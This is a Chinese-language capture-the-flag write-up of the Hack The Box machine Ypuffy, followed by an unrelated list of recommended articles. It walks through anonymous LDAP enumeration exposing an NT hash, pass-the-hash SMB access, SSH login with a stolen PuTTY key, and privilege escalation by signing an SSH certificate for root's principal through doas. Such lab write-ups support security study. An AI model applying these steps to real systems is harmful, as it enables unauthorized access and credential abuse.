大方子
大方子

【HTB系列】靶机Ypuffy的渗透测试详解

 

【HTB系列】靶机Ypuffy的渗透测试详解_第1张图片

====================================================================

 

信息收集

我们用nmap对靶机进行信息收集

nmap -sV -sT -sC -T5 10.10.10.107
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 17:25 CST
Warning: 10.10.10.107 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.107
Host is up (0.29s latency).
Not shown: 940 closed ports, 55 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
| fingerprint-strings: 
|   DNSVersionBindReqTCP, RPCCheck: 
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:59 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     
|     
|     
|     
|     400 Bad Request
|     
|     
|     
|     
400 Bad Request

|     

|     
OpenBSD httpd

|     
|     
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:55 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     
|     
|     
|     
|     400 Bad Request
|     
|     
|     
|     
400 Bad Request

|     

|     
OpenBSD httpd

|     
|_    
|_http-server-header: OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)

通过报告我们知道

在端口22上运行ssh,在端口80上运行http,在端口139和445上运行smb,在端口389上运行ldap。

我们先看看80端口

【HTB系列】靶机Ypuffy的渗透测试详解_第2张图片

好像出现了问题,那我们再看看SMB服务

看能不能进行匿名身份进行资源枚举

smbmap -H 10.10.10.107

提示认证失败

 

我们在换LDAP试试看,在namp的报告中提示,LDAP允许匿名访问

我们用ldapsearch工具老进行扫描

ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb

-h:IP地址

-p:监听端口

-x:简单认证

-b:搜索的入口

 

# extended LDIF
#
# LDAPv3
# base with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# hackthebox.htb
dn: dc=hackthebox,dc=htb
dc: hackthebox
objectClass: top
objectClass: domain

# passwd, hackthebox.htb
dn: ou=passwd,dc=hackthebox,dc=htb
ou: passwd
objectClass: top
objectClass: organizationalUnit

# bob8791, passwd, hackthebox.htb
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
cn: Bob
objectClass: account
objectClass: posixAccount
objectClass: top
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==
uidNumber: 5001
gidNumber: 5001
gecos: Bob
homeDirectory: /home/bob8791
loginShell: /bin/ksh

# alice1978, passwd, hackthebox.htb
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
gecos: Alice
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
displayName: Alice
sambaAcctFlags: [U          ]
sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaPwdLastSet: 1532916644

# group, hackthebox.htb
dn: ou=group,dc=hackthebox,dc=htb
ou: group
objectClass: top
objectClass: organizationalUnit

# bob8791, group, hackthebox.htb
dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: bob8791
userPassword:: e2NyeXB0fSo=
gidNumber: 5001

# alice1978, group, hackthebox.htb
dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: alice1978
userPassword:: e2NyeXB0fSo=
gidNumber: 5000

# ypuffy, hackthebox.htb
dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
sambaDomainName: YPUFFY
sambaSID: S-1-5-21-3933741069-3307154301-3557023464
sambaAlgorithmicRidBase: 1000
objectclass: sambaDomain
sambaNextUserRid: 1000
sambaMinPwdLength: 5
sambaPwdHistoryLength: 0
sambaLogonToChgPwd: 0
sambaMaxPwdAge: -1
sambaMinPwdAge: 0
sambaLockoutDuration: 30
sambaLockoutObservationWindow: 30
sambaLockoutThreshold: 0
sambaForceLogoff: -1
sambaRefuseMachinePwdChange: 0
sambaNextRid: 1001

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8
 

我们也可以使用nmap来枚举ldap,并调用一个脚本 ldap-search

nmap -p 389 --script ldap-search 10.10.10.107


PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: dc=hackthebox,dc=htb
|     dn: dc=hackthebox,dc=htb
|         dc: hackthebox
|         objectClass: top
|         objectClass: domain
|     dn: ou=passwd,dc=hackthebox,dc=htb
|         ou: passwd
|         objectClass: top
|         objectClass: organizationalUnit
|     dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
|         uid: bob8791
|         cn: Bob
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         userPassword: {BSDAUTH}bob8791
|         uidNumber: 5001
|         gidNumber: 5001
|         gecos: Bob
|         homeDirectory: /home/bob8791
|         loginShell: /bin/ksh
|     dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
|         uid: alice1978
|         cn: Alice
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: sambaSamAccount
|         userPassword: {BSDAUTH}alice1978
|         uidNumber: 5000
|         gidNumber: 5000
|         gecos: Alice
|         homeDirectory: /home/alice1978
|         loginShell: /bin/ksh
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
|         displayName: Alice
|         sambaAcctFlags: [U          ]
|         sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
|         sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
|         sambaPwdLastSet: 1532916644
|     dn: ou=group,dc=hackthebox,dc=htb
|         ou: group
|         objectClass: top
|         objectClass: organizationalUnit
|     dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: bob8791
|         userPassword: {crypt}*
|         gidNumber: 5001
|     dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: alice1978
|         userPassword: {crypt}*
|         gidNumber: 5000
|     dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
|         sambaDomainName: YPUFFY
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464
|         sambaAlgorithmicRidBase: 1000
|         objectclass: sambaDomain
|         sambaNextUserRid: 1000
|         sambaMinPwdLength: 5
|         sambaPwdHistoryLength: 0
|         sambaLogonToChgPwd: 0
|         sambaMaxPwdAge: -1
|         sambaMinPwdAge: 0
|         sambaLockoutDuration: 30
|         sambaLockoutObservationWindow: 30
|         sambaLockoutThreshold: 0
|         sambaForceLogoff: -1
|         sambaRefuseMachinePwdChange: 0
|_        sambaNextRid: 1001

Nmap done: 1 IP address (1 host up) scanned in 6.60 seconds
 

【HTB系列】靶机Ypuffy的渗透测试详解_第3张图片

我们得到一个用户名alice1978和一个smb NT哈希 0B186E661BBDBDCF6047784DE8B9FD8B

此哈希是不可破解的,但我们仍然可以使用它来进行身份验证。

 

然后我们用我们得到的账号和密码进行SMB枚举

这里我们用crackmapexec

crackmapexec 10.10.10.107  -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --shares

这里有2个共享一个是alice 可读可写 另一个IPC$不允许访问

 

我们也可以用smbclient来枚举

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/

 

然后我们连接下alic

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/alice

只有一个文件叫my_private_key.ppk

get my_private_key.ppk下载它

 

ppk是putty远程登陆使用的文件后缀,我们需要进行转换

 

my_private_key.ppk 是一个putty私钥,我们需要将其转换为ssh私钥,以便能够与它进行ssh。

在kali,我们按照putty-tools

apt-get install putty-tools

然后我们将使用puttygen:

puttygen my_private_key.ppk -O private-openssh -o alice.key

【HTB系列】靶机Ypuffy的渗透测试详解_第4张图片

然后

chmod 600 alice.key

最好进行连接 

ssh -i alice.key [email protected]

【HTB系列】靶机Ypuffy的渗透测试详解_第5张图片

【HTB系列】靶机Ypuffy的渗透测试详解_第6张图片

 

还记得http被重置吗,我们查看下/etc/httpd.conf

【HTB系列】靶机Ypuffy的渗透测试详解_第7张图片

 

location "/userca*"

location "/sshauth*"

进行2次重定向

 

同时发现 

另外的2个用户

在bob8971的家目录中存在一个sql文件

【HTB系列】靶机Ypuffy的渗透测试详解_第8张图片

【HTB系列】靶机Ypuffy的渗透测试详解_第9张图片

它创建一个名为的表principals和另一个名为的表keys

 

我们在检查下/etc/ssh/目录下的sshd_config文件

 

#       $OpenBSD: sshd_config,v 1.102 2018/02/16 02:32:40 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      .ssh/authorized_keys

#AuthorizedPrincipalsFile none

AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody

TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
ChallengeResponseAuthentication no

AllowAgentForwarding no
AllowTcpForwarding no
#GatewayPorts no
X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem       sftp    /usr/libexec/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server
 

【HTB系列】靶机Ypuffy的渗透测试详解_第10张图片

 

所以http服务负责一些ssh身份验证的东西,

我们用curl 请求下第一个 

curl 'http://127.0.0.1/sshauth?type=keys&username=root'

没有任何返回 

再试试第二个

curl 'http://127.0.0.1/sshauth?type=principals&username=root'

请求root的密钥给我们没有响应,但是请求我们得到的主体3m3rgencyB4ckd00r

 

生成和签署ssh密钥,获取root权限

所以现在我们有了root的主体3m3rgencyB4ckd00r。从理论上讲,我们可以生成ssh密钥并使用root的主体对它们进行签名,我们将能够以root身份与它们进行ssh。

问题是,因为alice1978我们没有被授权这样做。

在Linux上,我们可以检查是否可以运行提升的命令,sudo -l

但是这里没有

 

我们检查下doas

doas是BSD系列系统下的权限管理工具,类似于Debian系列下的sudo命令

 

这里我们看到alice1978可以 不需要密码作为用户userca执行/usr/bin/ssh-keygen

第一步是为其创建ssh密钥 

ssh-keygen -t rsa -f /tmp/id_rsa

【HTB系列】靶机Ypuffy的渗透测试详解_第11张图片

然后我们需要证书(ca),我们到 /home/userca/

并签署我们刚刚创建的ssh密钥

-s证书

-I身份

-n主体

最后我们将以root身份ssh:

ssh -i /tmp/id_rsa root@localhost

【HTB系列】靶机Ypuffy的渗透测试详解_第12张图片

你可能感兴趣的:(CTF以及各类靶机,HTB靶场题解集合)

  • Browser Use开启AI辅助网页操作新时代 CodeJourney. python人工智能算法数据库
    在当今数字化时代,人们的工作和生活与互联网紧密相连。每天,我们都要花费大量时间在各类网站之间穿梭,进行诸如填写表单、查询信息、比价等重复性操作。这些工作不仅耗费精力,还容易因疲劳而出错,严重影响了工作效率。而现有的自动化工具,要么需要掌握专业的编程知识才能使用,要么在功能上存在局限性,让普通技术用户望而却步。不过,随着人工智能技术的飞速发展,一款名为BrowserUse的开源项目应运而生,为我们带
  • Python XML 解析 lsx202406 开发语言
    PythonXML解析引言XML(可扩展标记语言)是一种用于存储和传输数据的标记语言。Python作为一种功能强大的编程语言,提供了多种解析XML的方法。本文将详细介绍Python中常用的XML解析方法,包括XML解析的基本概念、常用库以及解析实例。XML解析的基本概念1.XML文档结构XML文档由以下几部分组成:声明:声明XML版本和编码方式。根元素:文档中所有元素的父元素。元素:XML文档中的
  • Shell变量详解 ivwdcwso 操作系统与云原生Shelllinux脚本
    Shell变量是Shell脚本编程中非常重要的一个概念。合理使用变量可以让脚本更加灵活和易于维护。本文将详细介绍Shell变量的定义、使用、作用域以及一些高级用法。1.变量的定义和赋值在Shell中定义变量非常简单,格式为:variable_name=value注意等号两边不能有空格。例如:name="John"age=30Shell变量名可以由字母、数字和下划线组成,但不能以数字开头。2.使用变
  • MySQL 5.7 vs MySQL 8.0 高频面试题解析 dblens 数据库管理和开发工具 mysql数据库
    一、基础概念与核心差异1.默认字符集的变化问:MySQL5.7和8.0的默认字符集有何不同?为什么要修改?答:MySQL5.7默认字符集为latin1,可能导致中文乱码。MySQL8.0默认改为utf8mb4(支持4字节编码,如表情符号),且默认排序规则为utf8mb4_0900_ai_ci。意义:彻底解决字符编码问题,兼容国际化需求。2.用户认证方式的演进问:从5.7到8.0,用户密码认证方式有
  • SQL语言的编译原理 慕瑶琴 包罗万象golang开发语言后端
    SQL语言的编译原理引言SQL(StructuredQueryLanguage,结构化查询语言)是用于管理和操作关系数据库的一种标准语言。作为一种高级语言,SQL不仅易于使用,而且功能强大。然而,SQL语言本身并不能直接被计算机理解。为了让计算机能够执行SQL语句,我们需要通过编译原理将SQL语句转换为机器能够理解的指令。本文将探讨SQL语言的编译原理,介绍SQL的组成部分、编译过程以及相关的优化
  • 思维链在可控核聚变等离子体控制中的应用:AI驱动的能源革命 AI大模型应用之禅 DeepSeek人工智能能源ai
    概述《思维链在可控核聚变等离子体控制中的应用:AI驱动的能源革命》旨在探讨AI技术在可控核聚变等离子体控制中的实际应用,以及如何通过思维链实现能源革命。本文将从以下几个方面展开讨论:核聚变等离子体控制背景、思维链技术介绍、AI在等离子体控制中的应用、算法原理与实现、系统设计与实现、项目实战以及最佳实践与展望。一、核聚变等离子体控制背景核聚变是一种通过将轻原子核在高温高压下聚合成更重的原子核,释放出
  • AI 创业团队:技术人才与商业人才的完美搭配 yaxin0765 人工智能
    目录一、技术人才的核心价值二、商业人才的关键作用三、实现完美搭配的策略在AI创业的赛道上,一个优秀的团队是决定企业成败的关键因素。而在这个团队中,技术人才与商业人才的完美搭配,如同鸟之双翼、车之两轮,缺一不可。他们各自发挥独特优势,相互协作,共同推动AI创业企业驶向成功的彼岸。一、技术人才的核心价值奠定技术根基:技术人才是AI创业企业的技术基石。他们精通各类AI算法、编程语言和开发框架,能够搭建起
  • 设计模式之外观模式:原理、实现与应用 wenbin_java 设计模式外观模式
    引言外观模式(FacadePattern)是一种结构型设计模式,它通过提供一个统一的接口来简化复杂系统的使用。外观模式隐藏了系统的复杂性,使得客户端可以通过一个简单的接口与系统交互。本文将深入探讨外观模式的原理、实现方式以及实际应用场景,帮助你更好地理解和使用这一设计模式。1.外观模式的核心概念1.1什么是外观模式?外观模式是一种结构型设计模式,它通过提供一个统一的接口来简化复杂系统的使用。外观模
  • 【同等学力】04-排列组合 源图客 【同等学力】数学真题数学
    1、一个饭店提供3种不同的甜点,假设期顾客小王进饭店时,每种甜点足够多,则小王选4个甜点的方式有2、设集合A={1,2,3,4},则集合A上有15种等价关系。解析:使用第二类Stirling求其不同的划分个数:S(4,1)+S(4,2)+S(4,3)+S(4,4)根据公式:S(n,1)=1,计算Stirling数的值:S(4,1)=1S(4,1)=1根据公式:S(n,2)=2m-1-1,计算Sti
  • 网络高手,早就把ping命令玩得很6了! 大侠之运维 网络
    网络高手,早就把ping命令玩得很6了!当谈到网络故障排除工具时,Ping(PacketInternetGroper)是其中最常用和最基本的之一。它是一个用于测试网络连接的命令行工具,可以帮助确定计算机是否能够与另一个计算机或网络设备进行通信。本文将深入介绍Ping命令,包括其基本用法、高级选项以及如何解释Ping的结果。第一部分:Ping命令的基本用法什么是Ping命令?Ping命令是一个网络工
  • 外贸 B2B 平台没落?多语言批发系统正在崛起 多语言电商系统 多语言电商系统外贸电商多语言订货系统多语言电商系统多语言订货系统跨境电商外贸订货系统
    近年来,全球外贸行业正在发生快速变化,传统的B2B平台正面临越来越多的挑战,尤其是在面对新兴的多语言批发系统时。这种变化不仅影响了供应商和买家之间的交易方式,也正在推动外贸行业的数字化升级和转型。今天,让我们一起探讨外贸B2B平台的逐渐没落以及多语言批发系统的崛起。外贸B2B平台的困境外贸B2B平台,如阿里巴巴国际站、环球资源等,曾经是许多企业获取海外客户的主要途径。通过这些平台,商家可以轻松地找
  • Spring Boot自动装配原理 咸阳彭于晏 SpringBootspringbootjavaspring后端
    SpringBoot自动装配原理一、什么是自动装配?自动装配通过分析类路径下的依赖、Bean的定义以及其他配置信息,自动配置Spring应用程序的配置类和Bean,以减少开发人员的配置工作,提高开发效率。    SpringBoot的自动装配实际上是从META-INF/spring.factories文件中获取到对应的需要进行自动装配的类,并生成相应的Bean对象,然后将它们交给Spring容器进
  • 【C++动态库】DLL动态库加载失败导致程序启动报错以及DLL库加载失败的常见原因分析与总结 dvlinker C/C++实战专栏C/C++软件开发从入门到实战dll动态库隐式加载动态加载加载失败LoadLibraryEx动态库找不到接口找不到
    目录1、问题说明2、dll库的隐式加载与动态加载2.1、dll库的隐式加载2.2、dll库的显式加载3、使用ProcessExplorer查看进程加载的dll库信息以及动态加载的dll库有没有加载成功3.1、使用ProcessExplorer查看进程加载的dll库信息3.2、使用ProcessExplorer查看动态启动的库有没有加载成功4、dll库加载失败原因详细分析与说明4.1、dll位数与依
  • Axios和ajax的异同点详解以及在express后端使用redirect重定向对ajax无效的原因! char56789 javascriptnode.jsreactjs
    问题描述:在express中使用redirect进行重定向时,页面显示是301状态码,页面不跳转!(说明在express中不能使用redirect进行重定向)究其原因:使用ajax后,后端无法直接让前端进行页面跳转。需要前端进行状态码和后端返回的数据的判断,然后前端自己进行跳转页面。因为ajax(axios只是对ajax进行了封装,ajax在此处的特性对axios也适用)是一个完整的请求和回掉的过
  • 代码随想录第五十五天| 并查集理论基础 寻找存在的路径 kill bert 代码随想录算法训练营算法数据结构
    并查集理论基础背景并查集是一种数据结构,主要用于解决元素的连通性问题。简单来说,当我们需要判断多个元素是否属于同一个集合时,并查集可以高效地完成这一任务。它支持两种基本操作:将两个元素合并到同一个集合中,以及判断两个元素是否属于同一个集合。原理讲解并查集的核心思想是通过一个数组来记录每个元素的父节点,从而形成一种树形结构。每个集合用一棵树来表示,树的根节点即为该集合的代表元素。具体来说:初始化:每
  • 代码随想录第五十三天| 102.沉没孤岛 105.有向图的完全可达性 106.岛屿的周长 kill bert 代码随想录算法训练营java算法数据结构
    字符串转换序列题目描述给定一个字符串beginStr和一个字符串endStr,以及一个字典strList。找到从beginStr到endStr的最短转换序列中的字符串数目。转换规则如下:序列中第一个字符串是beginStr。序列中最后一个字符串是endStr。每次转换只能改变一个字符。转换过程中的中间字符串必须是字典strList中的字符串,且每个字符串只能使用一次。如果不存在这样的转换序列,返回
  • 分析Windows操作系统的容量为什么会越来越大? 网硕互联的小客服 服务器运维网络windows
    Windows操作系统容量逐渐增大的原因是多方面的,反映了技术进步、用户需求变化以及微软在功能、兼容性、安全性等方面的权衡。以下是关键因素的分析:1.功能扩展与复杂度提升新功能集成:每代Windows都会引入新功能(如Cortana、虚拟桌面、WSL、DirectStorage等),这些功能需要额外的代码库、图形界面和支持文件。多场景支持:Windows需兼顾个人电脑、工作站、游戏设备、企业服务器
  • C语言的软件工程 苏墨瀚 包罗万象golang开发语言后端
    C语言的软件工程引言C语言作为一种历史悠久、功能强大的编程语言,在软件工程领域有着广泛的应用。自1972年由DennisRitchie开发以来,C语言凭借其高效性能、灵活性以及可移植性,成为了操作系统、嵌入式系统及高性能应用程序开发的首选语言之一。在软件工程的过程中,成熟的软件开发模型、工具及方法论是保障软件质量的关键因素。本文将从软件工程的基本概念入手,探讨C语言在软件工程中的应用与实践,包括软
  • Maven 插件 先睡 mavenjava
    为Maven插件配置环境变量通常涉及到设置Java环境变量以及Maven相关的环境变量。以下是一些基本步骤:1.设置Java环境变量Maven需要Java运行环境,因此您需要确保Java的环境变量已经正确设置。-**JAVA_HOME**:指向您的Java安装目录。-**PATH**:包含`%JAVA_HOME%\bin`,使得`java`和`javac`命令可以在命令行中直接使用。在Window
  • python的后端开发框架django,flask,flaskapi myjzwsz pythondjangoflask
    Django、Flask和Flask-API是Python中流行的后端开发框架,它们在功能、应用场景以及架构上有不同的特点和使用场景。下面我给你详细介绍每个框架的应用示例、区别和应用场景:1.DjangoDjango是一个功能全面的Web开发框架,强调“快速开发”和“无需重新发明轮子”。它自带了很多功能,如认证、ORM(数据库映射)、表单处理、管理后台等。应用示例:社交媒体平台:像Instagra
  • 如何计算一个7B的模型训练需要的参数量以及训练时需要的计算资源 yxx122345 算法
    计算理论过程见:transformer中多头注意力机制的参数量是多少?1.模型参数量的计算7B参数模型的总参数量是70亿(7billion)。这些参数主要分布在以下几个部分:Transformer层:多头注意力机制(Multi-HeadAttention)前馈神经网络(Feed-ForwardNetwork)嵌入层(EmbeddingLayer):词嵌入(TokenEmbeddings)位置编码(
  • 程序员必看!DeepSeek全栈开发实战指南:从代码生成到性能优化 AI创享派 后端
    一、DeepSeek技术新突破:程序员效率革命(开篇结合最新技术动态)2025年2月25日,DeepSeek接连放出两大技术王牌:全球首个面向MoE模型的全栈通信库DeepEP开源,以及深度思考R1模型的全面升级。这两项技术突破对程序员群体意义重大:通信效率飞跃:DeepEP通过NVLink优化实现GPU间158GB/s传输速度,后端开发者训练大模型时可节省60%集群资源推理性能突破:R1模型在H
  • springboot一课一得 POlse springboot
    SpringBoot学习之路:从基础到进阶SpringBoot是基于Spring框架的一个开源项目,它通过简化配置、自动化功能以及集成多种开箱即用的技术,使开发者能够更快地开发、测试和部署Java应用程序。它不仅减少了开发者的配置工作量,还为开发者提供了很多与生产环境相关的功能,使得SpringBoot成为现代Web开发、微服务架构和企业级应用开发的首选框架。本文将基于“SpringBoot一课一
  • 关于xshell和todesk两种远程控制电脑的区别以及核心原理 白雪落青衣 运维
    Xshell和ToDesk都是远程控制工具,但它们在功能、应用场景以及核心原理上存在显著差异。一、核心原理Xshell原理概述:Xshell是一款终端仿真器,主要凭借SecureShell(SSH)协议来实施远程控制和管理。SSH是一种加密的网络协议,用于在不太安全的网络环境中安全地开展系统管理以及数据传输。具体步骤:构建加密连接:用户启动Xshell并输入远程服务器的地址以及登录凭据后,Xshe
  • 深入解析 C# Lambda 表达式 江沉晚呤时 C#lucene.netcorenetc#asp.net
    C#中的Lambda表达式为开发者提供了一种简洁、灵活的方式来编写匿名方法或委托。随着C#的版本不断更新,Lambda表达式变得越来越重要,特别是在LINQ(语言集成查询)、事件处理、回调以及其他函数式编程场景中。本文将详细讲解C#Lambda表达式的概念、语法、应用及其与委托、匿名方法的关系,帮助你更好地理解和运用Lambda表达式。1.什么是Lambda表达式?Lambda表达式是一种可以在没
  • 五、AIGC大模型_05模型的vLLM部署与LangChain调用 学不会lostfound AI人工智能langchainopenaivLLMAIGC
    0、概述要搭建一个大模型应用服务,通常需要包含以下五层结构,即:基础环境、模型层、推理层、对外接口、外挂应用在了解了模型的微调训练之后,本文将以vLLM、OpenAI、LangChain为例,介绍大模型的推理部署以及对外接口开放调用1、vLLM1.1定义vLLM(VirtualLargeLanguageModel)是一个开源的大语言模型高速推理框架,由加州大学伯克利分校的LMSYS组织开发,它旨在
  • arcgis加载天地图_在arcmap和arcgispro中添加在线地图服务 Nx·仙鹤无名 arcgis加载天地图
    在arcmap或者arcgispro有时想使用一些免费在线地图服务辅助于其它的地理处理操作,下述介绍了如何在arcmap以及arcgispro中添加在线的地图服务。1、加载门户自身的在线底图arcmap加载基础底图提示:需要arcgisdesktop连接了arcgisonline的门户网址加载arcgisonline中的数据服务arcgispro前提:arcgispro如果登录了arcgisonl
  • 前端怎么处理请求失败会弹出一个 toast,如何保证批量请求失败,只弹出一个 大莲芒 前端
    在前端处理批量请求时,确保只弹出一个toast通知,可以通过以下步骤实现:使用状态管理首先,您可以使用状态管理工具(例如React的useState或Redux)来跟踪请求的状态。创建一个Toast组件如果还没有创建toast组件,可以简单实现一个。以下是一个基本的Reacttoast组件示例importReactfrom'react';import'./Toast.css';//添加样式cons
  • python基于django/flask体育馆管理系统Django-SpringBoot-php-Node.js-flask QQ_511008285 pythondjangoflaskspringbootphpnode.js
    目录技术栈介绍具体实现截图系统设计研究方法:设计步骤设计流程核心代码部分展示研究方法详细视频演示试验方案论文大纲源码获取/详细视频演示技术栈介绍Django-SpringBoot-php-Node.js-flask本课题的研究方法和研究步骤基本合理,难度适中,本选题是学生所学专业知识的延续,符合学生专业发展方向,对于提高学生的基本知识和技能以及钻研能力有益。该学生能够在预定时间内完成该课题的设计。
  • stm32软件闹钟 weixin_58595117 stm32嵌入式硬件单片机
    其实不是stm32啦,因为stm32流量高,这是一个通用的软件闹钟(软件实现的当然通用哈)。实现10个闹钟,需要mcu提供时间获取函数,1分钟定时检查调用,以及flash读写函数(用来掉电不丢失闹钟信息)。rtc_alarm.c#include"rtc_alarm.h"#include"debug.h"#include#include"system/includes.h"#defineDBG(fo
  • java Illegal overloaded getter method with ambiguous type for propert的解决 zwllxs javajdk
    好久不来iteye,今天又来看看,哈哈,今天碰到在编码时,反射中会抛出 Illegal overloaded getter method with ambiguous type for propert这么个东东,从字面意思看,是反射在获取getter时迷惑了,然后回想起java在boolean值在生成getter时,分别有is和getter,也许我们的反射对象中就有is开头的方法迷惑了jdk,
  • IT人应当知道的10个行业小内幕 beijingjava 工作互联网
    10. 虽然IT业的薪酬比其他很多行业要好,但有公司因此视你为其“佣人”。   尽管IT人士的薪水没有互联网泡沫之前要好,但和其他行业人士比较,IT人的薪资还算好点。在接下的几十年中,科技在商业和社会发展中所占分量会一直增加,所以我们完全有理由相信,IT专业人才的需求量也不会减少。   然而,正因为IT人士的薪水普遍较高,所以有些公司认为给了你这么多钱,就把你看成是公司的“佣人”,拥有你的支配
  • java 实现自定义链表 CrazyMizzz java数据结构
    1.链表结构   链表是链式的结构 2.链表的组成    链表是由头节点,中间节点和尾节点组成    节点是由两个部分组成:       1.数据域       2.引用域 3.链表的实现 &nbs
  • web项目发布到服务器后图片过一会儿消失 麦田的设计者 struts2上传图片永久保存
      作为一名学习了android和j2ee的程序员,我们必须要意识到,客服端和服务器端的交互是很有必要的,比如你用eclipse写了一个web工程,并且发布到了服务器(tomcat)上,这时你在webapps目录下看到了你发布的web工程,你可以打开电脑的浏览器输入http://localhost:8080/工程/路径访问里面的资源。但是,有时你会突然的发现之前用struts2上传的图片
  • CodeIgniter框架Cart类 name 不能设置中文的解决方法 IT独行者 CodeIgniterCart框架 
    今天试用了一下CodeIgniter的Cart类时遇到了个小问题,发现当name的值为中文时,就写入不了session。在这里特别提醒一下。 在CI手册里也有说明,如下: $data = array( 'id' => 'sku_123ABC', 'qty' => 1, '
  • linux回收站 _wy_ linux回收站
    今天一不小心在ubuntu下把一个文件移动到了回收站,我并不想删,手误了。我急忙到Nautilus下的回收站中准备恢复它,但是里面居然什么都没有。     后来我发现这是由于我删文件的地方不在HOME所在的分区,而是在另一个独立的Linux分区下,这是我专门用于开发的分区。而我删除的东东在分区根目录下的.Trash-1000/file目录下,相关的删除信息(删除时间和文件所在
  • jquery回到页面顶端 知了ing htmljquerycss
    html代码: <h1 id="anchor">页面标题</h1> <div id="container">页面内容</div> <p><a href="#anchor" class="topLink">回到顶端</a><
  • B树、B-树、B+树、B*树 矮蛋蛋 B树
    原文地址: http://www.cnblogs.com/oldhorse/archive/2009/11/16/1604009.html B树        即二叉搜索树:        1.所有非叶子结点至多拥有两个儿子(Left和Right); &nb
  • 数据库连接池 alafqq 数据库连接池
